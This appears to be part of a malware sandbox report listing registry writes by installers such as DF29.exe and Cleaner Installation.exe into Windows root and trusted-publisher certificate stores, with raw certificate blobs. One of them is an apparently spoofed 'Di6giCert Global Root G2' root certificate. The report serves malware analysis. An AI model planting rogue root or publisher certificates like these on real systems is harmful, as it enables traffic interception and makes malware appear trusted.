GameBoxWin64.exeRUNDLL32.EXEDF29.exeCleaner Installation.exeSetup.tmpSetup (14).exeRUNDLL32.EXEdescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\399783AA164437BDB5A30DD71F01B94EA5189672 RUNDLL32.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\399783AA164437BDB5A30DD71F01B94EA5189672\Blob = 0f00000001000000200000002c6f090647d8ef6abde2341fc6b22b4f98ab7f9eff5eb415e61b888a9502496b030000000100000014000000399783aa164437bdb5a30dd71f01b94ea51896721400000001000000140000009800469f6381daad6d592c0e4a1a8b97efd733a520000000010000007d02000030820279308201e2a00302010202085943dc7b47334426300d06092a864886f70d01010b050030623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b3009060355040613025553301e170d3139303832333232343132315a170d3233303832323232343132315a30623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100f1f42250304984cb1972561104fb10f441bddf42adf6db15f5b9d381c181fbb068e6584e0547e565b8baaa2d1f248a59c3e1e61c28ad7c95fa55b7189a90d5c585bb8cd61a019220c31295f5700da608da4c13c552273199921ff33f0642c9c66f199a5d5c35b65f88a102b07f6cfdcdd7449fea4d3aca711cf06ca6df1b68250203010001a3383036300f0603551d130101ff040530030101ff30230603551d11041c301a821844693667694365727420476c6f62616c20526f6f74204732300d06092a864886f70d01010b0500038181003016228e8053b913f4a80225212bee7e58fad36af3aa85accd51a54bf5e65b7b3586801629c504a168bf5f70cdfdaae3c7c8c2aea3512abd687b50651ca07356c23155ed8658e1ad06f3cb32f06b7257cea92f42ac0dd3761a9023834a6d082d09066ca14557a264a1acb16b57058fe11b0652849c2bccbd62c0cd0469f06838 DF29.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\399783AA164437BDB5A30DD71F01B94EA5189672\Blob = 040000000100000010000000fd764328d91dda5134d5cd7951d5077e1400000001000000140000009800469f6381daad6d592c0e4a1a8b97efd733a5030000000100000014000000399783aa164437bdb5a30dd71f01b94ea51896720f00000001000000200000002c6f090647d8ef6abde2341fc6b22b4f98ab7f9eff5eb415e61b888a9502496b20000000010000007d02000030820279308201e2a00302010202085943dc7b47334426300d06092a864886f70d01010b050030623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b3009060355040613025553301e170d3139303832333232343132315a170d3233303832323232343132315a30623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100f1f42250304984cb1972561104fb10f441bddf42adf6db15f5b9d381c181fbb068e6584e0547e565b8baaa2d1f248a59c3e1e61c28ad7c95fa55b7189a90d5c585bb8cd61a019220c31295f5700da608da4c13c552273199921ff33f0642c9c66f199a5d5c35b65f88a102b07f6cfdcdd7449fea4d3aca711cf06ca6df1b68250203010001a3383036300f0603551d130101ff040530030101ff30230603551d11041c301a821844693667694365727420476c6f62616c20526f6f74204732300d06092a864886f70d01010b0500038181003016228e8053b913f4a80225212bee7e58fad36af3aa85accd51a54bf5e65b7b3586801629c504a168bf5f70cdfdaae3c7c8c2aea3512abd687b50651ca07356c23155ed8658e1ad06f3cb32f06b7257cea92f42ac0dd3761a9023834a6d082d09066ca14557a264a1acb16b57058fe11b0652849c2bccbd62c0cd0469f06838 DF29.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be Cleaner Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000001465fa205397b876faa6f0a9958e5590e40fcc7faa4fb7c2c8677521fb5fb658140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 GameBoxWin64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f Setup.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA Cleaner Installation.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\399783AA164437BDB5A30DD71F01B94EA5189672\Blob = 5c000000010000000400000000040000040000000100000010000000fd764328d91dda5134d5cd7951d5077e1400000001000000140000009800469f6381daad6d592c0e4a1a8b97efd733a5030000000100000014000000399783aa164437bdb5a30dd71f01b94ea51896720f00000001000000200000002c6f090647d8ef6abde2341fc6b22b4f98ab7f9eff5eb415e61b888a9502496b190000000100000010000000481045cc2473f042e4cffff6c48dc01a20000000010000007d02000030820279308201e2a00302010202085943dc7b47334426300d06092a864886f70d01010b050030623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b3009060355040613025553301e170d3139303832333232343132315a170d3233303832323232343132315a30623121301f06035504030c1844693667694365727420476c6f62616c20526f6f7420473231193017060355040b0c107777772e64696769636572742e636f6d31153013060355040a0c0c446967694365727420496e63310b300906035504061302555330819f300d06092a864886f70d010101050003818d0030818902818100f1f42250304984cb1972561104fb10f441bddf42adf6db15f5b9d381c181fbb068e6584e0547e565b8baaa2d1f248a59c3e1e61c28ad7c95fa55b7189a90d5c585bb8cd61a019220c31295f5700da608da4c13c552273199921ff33f0642c9c66f199a5d5c35b65f88a102b07f6cfdcdd7449fea4d3aca711cf06ca6df1b68250203010001a3383036300f0603551d130101ff040530030101ff30230603551d11041c301a821844693667694365727420476c6f62616c20526f6f74204732300d06092a864886f70d01010b0500038181003016228e8053b913f4a80225212bee7e58fad36af3aa85accd51a54bf5e65b7b3586801629c504a168bf5f70cdfdaae3c7c8c2aea3512abd687b50651ca07356c23155ed8658e1ad06f3cb32f06b7257cea92f42ac0dd3761a9023834a6d082d09066ca14557a264a1acb16b57058fe11b0652849c2bccbd62c0cd0469f06838 DF29.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Setup (14).exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 